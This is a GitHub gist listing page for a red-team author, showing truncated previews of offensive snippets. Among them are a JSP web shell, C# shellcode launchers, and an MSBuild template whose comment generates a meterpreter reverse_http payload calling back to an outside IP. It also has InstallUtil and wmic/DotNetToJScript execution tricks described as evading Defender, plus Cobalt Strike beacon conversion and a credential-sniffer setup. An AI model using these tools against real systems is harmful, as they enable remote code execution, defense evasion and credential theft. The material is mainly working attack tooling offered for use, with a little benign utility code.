0xhexmex
0xhexmex
/ download_azure_blobs.ps1
Last active
August 17, 2022 18:35
— forked from Dillie-O/get_all_media.ps1
PowerShell script to iterate all containers and blobs in a storage account and download it. - forked to use Az module instead of Azure, and storage account name instead of connection string
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Usage: Install-Module Az > Import-Module Az > Connect-AzAccount > Get-AzStorageAccount > replace the $storage_account variable in the script > run the script | |
| $destination_path = '.' | |
| # $connection_string = '[AZURE_STORAGE_CONNECTION_STRING]' | |
| $storage_account = '' | |
| $storage_account = New-AzStorageContext -StorageAccountName $storage_account | |
| $containers = Get-AzStorageContainer -Context $storage_account |
0xhexmex
/ pcredz_howto.txt
Created
August 17, 2022 01:49
How to get PCredz working - might be related to having python3.10
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Install pipx (only needed to install pipenv) | |
| # python3 -m pip install --user pipx | |
| # python3 -m pipx ensurepath | |
| Install pipenv for python3.10 | |
| # apt install python3.10-venv | |
| # pipx install pipenv | |
| Clone PCredz, create pipenv in it, then clone python-libpcap and install it | |
| ┌──(root㉿kali)-[~] |
0xhexmex
/ fixterm.sh
Last active
April 21, 2022 21:03
Remove zsh auto-suggestions and syntax highlighting from AWS Kali AMI
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/zsh | |
| # Turn off auto suggestions | |
| rm /usr/share/zsh-autosuggestions/zsh-autosuggestions.zsh | |
| # Turn off syntax highlighting | |
| rm /usr/share/zsh-syntax-highlighting/zsh-syntax-highlighting.zsh | |
| # Reload terminal |
0xhexmex
/ cmd.jsp
Created
September 8, 2020 00:50
— forked from ErosLever/cmd.jsp
A simple and minimal yet effective JSP Web Shell that escapes command output as HTML entities as needed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <form method="GET" action=""> | |
| <input type="text" name="cmd" /> | |
| <input type="submit" value="Exec!" /> | |
| </form> <%! | |
| public String esc(String str){ | |
| StringBuffer sb = new StringBuffer(); | |
| for(char c : str.toCharArray()) | |
| if( c >= '0' && c <= '9' || c >= 'A' && c <= 'Z' || c >= 'a' && c <= 'z' || c == ' ' ) | |
| sb.append( c ); | |
| else |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Take a stageless CS Beacon raw payload and convert to shellcode in the '\xAA\xBB...' format | |
| # Attacks > Packages > Windows Executable (S) > Raw. Save as beacon.bin | |
| # hexdump -v -e '"\\x" 1/1 "%02X"' ./beacon.bin | |
| // Take any raw shellcode file and get the hex from it in the 'fe9820fa...' format | |
| # xxd -p -c 100000000000000000 ./payload.bin |
0xhexmex
/ sc_launcher_norwx.cs
Last active
May 24, 2023 23:58
C# shellcode launcher without using RWX memory
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Execute shellcode without using RWX memory | |
| // Will get caught by Defender as-is | |
| // Compile: C:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:sclaunch-norwx.exe /unsafe /platform:x86 .\sc_launcher_norwx.cs | |
| using System; | |
| using System.Runtime.InteropServices; | |
| namespace ShellCodeLauncher | |
| { |
0xhexmex
/ Static python executable.txt
Last active
December 2, 2024 12:15
How to turn a python script into a statically linked executable with pyinstaller and staticx
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Example below is with mitm6 (https://github.com/fox-it/mitm6/) | |
| // Note: Adding the '--add-binary' option here is specific to mitm6, not required in all cases. | |
| # pip install pyinstaller | |
| # pyinstaller --clean -F --add-binary="/usr/lib/x86_64-linux-gnu/libpython2.7.so.1.0:." ./mitm6.py | |
| // The step above will create a single binary in the ./dist/ directory called mitm6 | |
| // Install staticx and dependencies |
0xhexmex
/ generic-shellcode-launcher.cs
Last active
October 23, 2024 22:27
wmic code execution template
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Template taken from https://github.com/infosecn1nja/MaliciousMacroMSBuild/blob/master/templates/MSBuild_shellcode.csproj | |
| // Compile: C:\windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:c:\test.exe /platform:x86 /unsafe mylauncher.cs | |
| // Or as dll: C:\windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:c:\test.dll /platform:x86 /target:library /unsafe mylauncher.cs | |
| // Then DotNetToJScript.exe -v Auto -l JScript -o mylauncher.js -c ShellCodeLauncher.Program c:\test.dll | |
| // mylauncher.js can be put into something like a WMIC XSL template like so... | |
| /* | |
| // wmic-template.xsl | |
| // wmic os get /format:wmic-template.xsl (if you create x86 shellcode, need to use x86 version of wmic here - c:\windows\syswow64\wbem\wmic.exe) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* Template taken from https://github.com/infosecn1nja/MaliciousMacroMSBuild/blob/master/templates/MSBuild_shellcode.csproj | |
| Example to create a CS beacon stager, base64-encoded to insert into "strShellCode" variable below | |
| msfvenom -p windows/meterpeter/reverse_http LHOST=1.1.1.1 LPORT=443 -f raw -o /tmp/payload.bin && base64 -w0 /tmp/payload.bin | |
| Then execute this on target with "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe .\msbuild-shellcode.xml" | |
| Defender doesn't flag on this (as of 5/30/19) | |
| */ | |
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <Target Name="[TARGETNAME]"> | |
| <ClassExample /> |
0xhexmex
/ installutil - shellcode runner
Last active
June 14, 2022 22:28
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Almost entirely adopted from Casey Smith's POC -- reference link here https://gist.github.com/lithackr/b692378825e15bfad42f78756a5a3260 | |
| // First compile like this: | |
| // .\csc.exe /unsafe /platform:x86 /out:lol.exe .\goodpayload.cs | |
| // Then run exe like this: | |
| // .\InstallUtil.exe /logfile= /LogToConsole=false /U .\lol.exe | |
| using System; | |
| using System.Net; | |
| using System.Diagnostics; |
NewerOlder